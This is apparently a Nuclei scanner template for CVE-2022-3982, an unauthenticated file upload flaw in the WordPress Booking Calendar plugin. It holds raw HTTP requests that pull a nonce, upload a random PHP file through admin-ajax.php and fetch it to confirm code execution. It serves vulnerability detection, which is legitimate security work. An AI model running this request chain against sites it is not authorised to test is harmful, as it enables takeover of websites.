id: CVE-2022-3982 info: name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload author: theamanrawat severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 - https://wordpress.org/plugins/booking-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3982 - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 epss-score: 0.23569 epss-percentile: 0.96565 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: wpdevart product: booking_calendar framework: wordpress tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart variables: string: "CVE-2022-3982" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54 --------------------------1cada150a8151a54 Content-Disposition: form-data; name="action" wpdevart_form_ajax --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_id" x --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_nonce" {{nonce}} --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_data" {"wpdevart-submit":"X"} --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart-submit" 1 --------------------------1cada150a8151a54 Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream --------------------------1cada150a8151a54-- - | GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body_3 words: - '{{md5(string)}}' extractors: - type: regex name: nonce group: 1 regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true # digest: 4b0a0048304602210099fe2d391846a963b4a42e265f17285cd13e4453d388b83e971708525ba76393022100fe66b5447b1a2519e955e905fcbce32ef8cf6ae8c8171ed98e944af9f2fd34fb:922c64590222798bb761d5b6d8e72950